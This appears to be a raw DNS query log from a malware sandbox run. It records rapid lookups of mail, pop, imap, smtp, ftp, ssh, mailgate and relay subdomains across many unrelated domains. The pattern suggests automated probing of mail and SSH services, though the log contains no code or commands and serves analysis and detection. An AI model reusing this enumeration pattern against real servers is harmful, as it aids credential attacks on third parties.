                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.092777967 CET192.168.2.61.1.1.10x5013Standard query (0)mail.opsu.terna.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.099653959 CET192.168.2.61.1.1.10x793Standard query (0)mx.zoho.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.147316933 CET192.168.2.61.1.1.10xecc9Standard query (0)mail.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.147316933 CET192.168.2.61.1.1.10xc8b0Standard query (0)pop.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.154320955 CET192.168.2.61.1.1.10xc64fStandard query (0)mail.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.159846067 CET192.168.2.61.1.1.10x5a93Standard query (0)mail.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.159846067 CET192.168.2.61.1.1.10x13e6Standard query (0)pop.netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.161226034 CET192.168.2.61.1.1.10xb346Standard query (0)m.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.162688017 CET192.168.2.61.1.1.10x88f7Standard query (0)mail.mega.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.297024965 CET192.168.2.61.1.1.10x6faStandard query (0)mx2.hostinger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.306834936 CET192.168.2.61.1.1.10x8f68Standard query (0)mail.innovationdevelopment.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.306834936 CET192.168.2.61.1.1.10x498eStandard query (0)mail.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.307204962 CET192.168.2.61.1.1.10xcb0dStandard query (0)mail.pan.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.325368881 CET192.168.2.61.1.1.10xf5d2Standard query (0)mail.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.325368881 CET192.168.2.61.1.1.10xfb97Standard query (0)ww1.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.325368881 CET192.168.2.61.1.1.10x822cStandard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.325368881 CET192.168.2.61.1.1.10xd98dStandard query (0)mail.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.379048109 CET192.168.2.61.1.1.10xc722Standard query (0)mail.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.379616976 CET192.168.2.61.1.1.10xd9ebStandard query (0)www.minecraft.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.447433949 CET192.168.2.61.1.1.10x6682Standard query (0)mail.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.447433949 CET192.168.2.61.1.1.10x922aStandard query (0)smtp.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.447433949 CET192.168.2.61.1.1.10x91c6Standard query (0)mail.servicossociais.caixa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.447714090 CET192.168.2.61.1.1.10xe088Standard query (0)www.analvids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.691711903 CET192.168.2.61.1.1.10xf5d2Standard query (0)mail.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.691746950 CET192.168.2.61.1.1.10x822cStandard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.834916115 CET192.168.2.61.1.1.10x5e35Standard query (0)pop3.store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.834916115 CET192.168.2.61.1.1.10xa8c9Standard query (0)pop3.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.891926050 CET192.168.2.61.1.1.10xc019Standard query (0)www.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.891926050 CET192.168.2.61.1.1.10x5c26Standard query (0)www.kwyk.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.900330067 CET192.168.2.61.1.1.10x57a3Standard query (0)mail.multiideas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.900330067 CET192.168.2.61.1.1.10x20b9Standard query (0)pop3.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.906919956 CET192.168.2.61.1.1.10xaa30Standard query (0)ftp.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.906919956 CET192.168.2.61.1.1.10x7815Standard query (0)pop.pan.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.909924030 CET192.168.2.61.1.1.10x87dfStandard query (0)ww16.followerstiktok.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.918133974 CET192.168.2.61.1.1.10x5739Standard query (0)hartico.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.920658112 CET192.168.2.61.1.1.10xd5fStandard query (0)www.hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.118751049 CET192.168.2.61.1.1.10x2a9Standard query (0)www.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.123651028 CET192.168.2.61.1.1.10x302cStandard query (0)pop3.netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.392611980 CET192.168.2.61.1.1.10xbc0Standard query (0)xsaniime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.400741100 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.402108908 CET192.168.2.61.1.1.10xf292Standard query (0)www.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.467839003 CET192.168.2.61.1.1.10x2a9Standard query (0)www.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.763125896 CET192.168.2.61.1.1.10x7c80Standard query (0)www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.854192019 CET192.168.2.61.1.1.10xa1dbStandard query (0)ftp.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.879297972 CET192.168.2.61.1.1.10x14deStandard query (0)relay.signin.rockstargames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.892299891 CET192.168.2.61.1.1.10x3ceeStandard query (0)pop3.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.902431965 CET192.168.2.61.1.1.10xcb4dStandard query (0)ftp.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.915160894 CET192.168.2.61.1.1.10x7408Standard query (0)ftp.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.915565968 CET192.168.2.61.1.1.10x473fStandard query (0)ftp.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.936739922 CET192.168.2.61.1.1.10x2563Standard query (0)ftp.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.954267025 CET192.168.2.61.1.1.10x7340Standard query (0)ftp.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.969651937 CET192.168.2.61.1.1.10xf0f8Standard query (0)pop.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.986764908 CET192.168.2.61.1.1.10x3f8bStandard query (0)mail.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.019606113 CET192.168.2.61.1.1.10x15Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.056967020 CET192.168.2.61.1.1.10x39bbStandard query (0)ftp.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.142451048 CET192.168.2.61.1.1.10x7c80Standard query (0)www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.203859091 CET192.168.2.61.1.1.10xf42eStandard query (0)ftp.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.203859091 CET192.168.2.61.1.1.10xe892Standard query (0)store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.203859091 CET192.168.2.61.1.1.10xa91dStandard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.204902887 CET192.168.2.61.1.1.10xe940Standard query (0)ww12.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.204902887 CET192.168.2.61.1.1.10xf2efStandard query (0)www.yellosa.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.204902887 CET192.168.2.61.1.1.10xbc6fStandard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.205940008 CET192.168.2.61.1.1.10xd738Standard query (0)www.phonandroid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312689066 CET192.168.2.61.1.1.10x88aStandard query (0)ftp.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312689066 CET192.168.2.61.1.1.10x473fStandard query (0)ftp.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312952042 CET192.168.2.61.1.1.10x7340Standard query (0)ftp.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312952042 CET192.168.2.61.1.1.10xf0f8Standard query (0)pop.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.312952042 CET192.168.2.61.1.1.10xbad3Standard query (0)relay.ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.337090969 CET192.168.2.61.1.1.10x964Standard query (0)mail.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.337230921 CET192.168.2.61.1.1.10xa4d3Standard query (0)mail.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.340820074 CET192.168.2.61.1.1.10x413eStandard query (0)mail.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.340821028 CET192.168.2.61.1.1.10x78edStandard query (0)ftp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.345436096 CET192.168.2.61.1.1.10x84f6Standard query (0)ftp.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.349050999 CET192.168.2.61.1.1.10x76daStandard query (0)pop.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.349050999 CET192.168.2.61.1.1.10x7d49Standard query (0)smtp.v.xsanime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.352492094 CET192.168.2.61.1.1.10xb223Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.355762959 CET192.168.2.61.1.1.10x50f2Standard query (0)ftp.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.400013924 CET192.168.2.61.1.1.10x17c0Standard query (0)ftp.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.400013924 CET192.168.2.61.1.1.10x81e6Standard query (0)ssh.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.400803089 CET192.168.2.61.1.1.10xcc36Standard query (0)pop.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.401232004 CET192.168.2.61.1.1.10x8817Standard query (0)pop.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.402019978 CET192.168.2.61.1.1.10xc5d3Standard query (0)ssh.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.406260014 CET192.168.2.61.1.1.10xf1d3Standard query (0)pop.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.406754017 CET192.168.2.61.1.1.10xc41aStandard query (0)pop.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.408082962 CET192.168.2.61.1.1.10xb204Standard query (0)ssh.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.426711082 CET192.168.2.61.1.1.10x5cc0Standard query (0)mailgate.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.431658030 CET192.168.2.61.1.1.10x2851Standard query (0)mailgate.store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.431658030 CET192.168.2.61.1.1.10x8dcaStandard query (0)mailgate.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.431658030 CET192.168.2.61.1.1.10x1e41Standard query (0)mail.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.436873913 CET192.168.2.61.1.1.10x3f54Standard query (0)ssh.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.438569069 CET192.168.2.61.1.1.10xf8d3Standard query (0)ssh.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.438570023 CET192.168.2.61.1.1.10x97bStandard query (0)ssh.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.438570023 CET192.168.2.61.1.1.10x8f49Standard query (0)ssh.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.439399958 CET192.168.2.61.1.1.10xe741Standard query (0)ssh.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.439951897 CET192.168.2.61.1.1.10x5f6cStandard query (0)ssh.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.439951897 CET192.168.2.61.1.1.10xd677Standard query (0)ssh.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.452308893 CET192.168.2.61.1.1.10x674bStandard query (0)imap.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.452308893 CET192.168.2.61.1.1.10xf057Standard query (0)mailgate.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.473272085 CET192.168.2.61.1.1.10xc542Standard query (0)mailgate.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.473272085 CET192.168.2.61.1.1.10x55a9Standard query (0)pop3.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.495791912 CET192.168.2.61.1.1.10xb74eStandard query (0)mailgate.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.516767979 CET192.168.2.61.1.1.10x43a4Standard query (0)imap.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.540638924 CET192.168.2.61.1.1.10xe940Standard query (0)ww12.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.540638924 CET192.168.2.61.1.1.10xf2efStandard query (0)www.yellosa.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.540638924 CET192.168.2.61.1.1.10xa91dStandard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.540976048 CET192.168.2.61.1.1.10xfef4Standard query (0)imap.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.541884899 CET192.168.2.61.1.1.10x6572Standard query (0)imap.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.562807083 CET192.168.2.61.1.1.10x1054Standard query (0)pop.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.641094923 CET192.168.2.61.1.1.10xb84aStandard query (0)pop3.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.643251896 CET192.168.2.61.1.1.10x4f6cStandard query (0)pop.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.663666010 CET192.168.2.61.1.1.10x1de5Standard query (0)pop3.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.664390087 CET192.168.2.61.1.1.10xeeb8Standard query (0)mailgate.netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.664390087 CET192.168.2.61.1.1.10xe5abStandard query (0)imap.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.664390087 CET192.168.2.61.1.1.10x1c76Standard query (0)pop3.pan.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.681240082 CET192.168.2.61.1.1.10x78edStandard query (0)ftp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.695492983 CET192.168.2.61.1.1.10xed82Standard query (0)relay.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.703273058 CET192.168.2.61.1.1.10xb223Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.704566956 CET192.168.2.61.1.1.10x3e26Standard query (0)pop.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.704566956 CET192.168.2.61.1.1.10xfaeaStandard query (0)relay.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.720278025 CET192.168.2.61.1.1.10x54b8Standard query (0)relay.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.751369953 CET192.168.2.61.1.1.10xc41aStandard query (0)pop.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.789452076 CET192.168.2.61.1.1.10x2a74Standard query (0)pop3.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.827008963 CET192.168.2.61.1.1.10x97bStandard query (0)ssh.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.830457926 CET192.168.2.61.1.1.10xd677Standard query (0)ssh.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.830457926 CET192.168.2.61.1.1.10x5f6cStandard query (0)ssh.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.830457926 CET192.168.2.61.1.1.10x55a9Standard query (0)pop3.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.856229067 CET192.168.2.61.1.1.10x6718Standard query (0)pop3.servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.856229067 CET192.168.2.61.1.1.10xf239Standard query (0)ssh.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.856229067 CET192.168.2.61.1.1.10xc093Standard query (0)adf.lyA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.879777908 CET192.168.2.61.1.1.10x4f91Standard query (0)mailgate.aeaaamorim.inovarmais.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.881407022 CET192.168.2.61.1.1.10xce01Standard query (0)pop.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.890953064 CET192.168.2.61.1.1.10x17ddStandard query (0)mailgate.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.890953064 CET192.168.2.61.1.1.10x4667Standard query (0)relay.naukrigulf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.890953064 CET192.168.2.61.1.1.10x20e5Standard query (0)pop.servicossociais.caixa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.891561985 CET192.168.2.61.1.1.10x7e69Standard query (0)vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.908252001 CET192.168.2.61.1.1.10xc131Standard query (0)imap.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.908869028 CET192.168.2.61.1.1.10xcd8fStandard query (0)pop3.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.933182955 CET192.168.2.61.1.1.10x6c08Standard query (0)imap.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.941154003 CET192.168.2.61.1.1.10xbe3dStandard query (0)imap.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.941427946 CET192.168.2.61.1.1.10x4306Standard query (0)relay.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.945602894 CET192.168.2.61.1.1.10xbc6dStandard query (0)mailgate.v.xsanime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.949589968 CET192.168.2.61.1.1.10x8091Standard query (0)mailgate.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.949666977 CET192.168.2.61.1.1.10x587fStandard query (0)relay.netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.956320047 CET192.168.2.61.1.1.10xfa4cStandard query (0)pop3.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412067890 CET192.168.2.61.1.1.10xec17Standard query (0)ssh.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412631035 CET192.168.2.61.1.1.10x1c55Standard query (0)mail.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412663937 CET192.168.2.61.1.1.10x2a74Standard query (0)pop3.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412683964 CET192.168.2.61.1.1.10xc093Standard query (0)adf.lyA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412710905 CET192.168.2.61.1.1.10x20e5Standard query (0)pop.servicossociais.caixa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412727118 CET192.168.2.61.1.1.10x17ddStandard query (0)mailgate.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412748098 CET192.168.2.61.1.1.10xce01Standard query (0)pop.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412770987 CET192.168.2.61.1.1.10x4306Standard query (0)relay.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.412791014 CET192.168.2.61.1.1.10xbc6dStandard query (0)mailgate.v.xsanime.comA (IP address)IN (0x0001)false
